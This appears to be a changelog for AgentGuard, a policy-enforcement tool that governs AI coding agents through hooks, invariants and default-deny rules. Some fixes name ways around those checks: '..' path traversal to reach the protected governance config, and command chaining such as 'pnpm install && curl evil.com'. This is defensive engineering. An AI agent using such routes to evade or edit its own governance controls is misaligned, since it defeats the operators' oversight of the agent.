v2.10.3

v2.10.3

Fixed

• no-governance-self-modification invariant scoped to config only (#1351) — operational state paths (roadmaps, squads, queue, persona, metrics, identity) are now writable. Only actual governance config (agentguard.yaml, policies/) remains protected.
• Path traversal protection — paths like .agentguard/squads/../agentguard.yaml are now normalized before matching, preventing bypass of governance protection via .. traversal.
• Heredoc false positive fix (Go kernel) — heredoc body content no longer triggers governance path scanning. Only the command header line is checked.
• gh command false positive fix (Go kernel) — gh CLI commands (GitHub API calls) are now correctly identified even when wrapped with rtk, npx, sudo, etc.

Impact

This release unblocks ~50% of swarm agents that were being falsely denied by the overly broad self-modification invariant. EMs can now write squad state, roadmap sync works, analytics agents can write state, and commands mentioning .agentguard/ paths in heredoc content are no longer blocked.

Full Changelog: v2.10.2...v2.10.3

v2.10.2 — Unified main branch

Main/master sync complete. Deepagents removed. Rust CI removed. Master branch deleted.

v2.10.1 — Cold-Start DX Fix

Postinstall creates default identity + dirs. Wrapper preserves stdin. CI ships Go binaries.

v2.10.0 — Go Kernel Complete

Go Kernel — Full TS Hook Parity (145x faster)

The Go kernel now handles all Claude Code hook events with complete feature parity, replacing the TypeScript hook pipeline entirely.

What's new

• FromStdin() support — Go binary reads Claude Code's stdin JSON payloads natively (root cause fix: the Go fast-path was never executing because it only read env vars that Claude Code doesn't set)
• Enforcement mode routing — enforce, guide, educate, monitor modes from policy mode: field
• Read-only tool fail-open — Read/Glob/Grep/LS/WebSearch/WebFetch bypass default-deny
• Invariant checking — 22 built-in invariants evaluated in Go
• Session state — format/test pass tracking, written file tracking, retry counters
• Agent identity wizard — blocks with setup prompt when .agentguard-identity is missing
• Lesson capture — educate mode records denials for agent learning
• Cloud telemetry — async event sending to AgentGuard dashboard
• PostToolUse — bash error reporting, format/test pass detection, PR creation detection
• Stop/Notification — session viewer generation, live viewer spawn
• Wildcard policy matching — action: "*" and git.* namespace patterns

Performance

• 2ms Go kernel vs 290ms TypeScript — 145x faster hook evaluation
• TS fallback removed from the hook wrapper

Breaking changes

None. The Go kernel is a drop-in replacement. Existing policies and configurations work unchanged.

Bootstrap fix (#995)

Shared bootstrap.ts module with command-chaining protection across all 4 drivers (Claude, Copilot, Codex, Gemini). Prevents bypasses like pnpm install && curl evil.com.

4-driver postinstall (#1281)

postinstall now detects and configures all 4 AI coding drivers (Claude Code, Copilot CLI, Codex CLI, Gemini CLI).

v2.9.3

What's Changed

Features

• feat: shared binary resolver — all init commands (claude-init, copilot-init, goose-init, deepagents-init) now use identical binary resolution logic. Fixes broken hooks when cwd is a subrepo. (#1283)
• feat: goose-init — new agentguard goose-init command for Block's Goose CLI integration via MCP extension (#1283)
• feat: unknown command warn+audit — Option A default-deny for conference demo. Unknown shell.exec commands emit UnknownCommandWarn event (allowed, not blocked) for cloud dashboard telemetry. (#1279, closes agentguard-workspace#179)

Bug Fixes

• fix: governance self-modification — skip command scan for gh commands in no-governance-self-modification invariant (#1280)

Full Changelog

v2.9.2...v2.9.3

v2.9.2

What's Changed

Bug Fixes

• fix(matchers): safe-subshell allowlist — prevent $(date), $(whoami), $(hostname) and 6 other read-only subshell families from triggering false-positive command scanner denials. Eliminates ~700 false-positive governance denials/day. 20 new tests, ReDoS-safe patterns. (#1274, closes #1139)

Tests

• test(cli): studio wizard coverage — agentguard init studio interactive wizard test coverage (#1268)

Full Changelog

v2.9.1...v2.9.2

v2.9.1

Bug Fixes

• fix(policy): Wildcard action rule "*" now correctly matches all action types including shell.exec when defaultDeny is enabled (#1253)
  • Root cause: authorizeIntent() in AAB denied destructive commands before the policy evaluator ran, bypassing wildcard allow rules
  • Also fixed Go fast-path evaluator to support namespace wildcards (git.* matches git.push)

What's Changed

This patch fixes a regression where agent squads were blocked from running shell commands even when the policy had an explicit catch-all allow rule. The analytics squad was 100% dark for 24h+ due to this bug.

Full Changelog: v2.9.0...v2.9.1

v2.9.0 — Go kernel fast-path: 3ms policy evaluation

Go evaluator wildcard fix unblocks 3ms fast-path. 26-100x faster hook evaluation.

v2.8.5 — Copilot report_intent fix + governance self-mod scoping

Fixes

Copilot report_intent default-deny (#1206)

Added agent.report_intent and agent.internal to the default policy allow list. Without this, Copilot CLI's internal report_intent tool hit default-deny, blocking all 46 Copilot agents.

Governance self-modification invariant scoping (#1201)

Operational state files under .agentguard/ are now exempt from the governance self-modification invariant:

• .agentguard/squads/ (EM squad state)
• .agentguard/director-brief* (director brief)
• .agentguard/persona.env (agent identity)
• .agentguard/agent-reliability*, swarm-state*, budget-config*

These are runtime state files, not governance policy. Blocking them prevented EMs from updating squad state and broke the director brief flow.

v2.8.4 — Idempotent hooks + workspace-resolved paths

Fixes

claude-init: idempotent hooks (#1163)

Running agentguard claude-init multiple times no longer duplicates hook entries. Hooks are now assigned (overwrite) instead of appended.

claude-init: workspace-resolved paths

PostToolUse, Notification, and Stop hooks now resolve the AgentGuard binary from AGENTGUARD_WORKSPACE via git common-dir, matching the PreToolUse wrapper pattern. Fixes 'No such file or directory' errors when Claude Code CWD changes (worktrees, nested repos).

Run agentguard claude-init --refresh to regenerate clean hooks.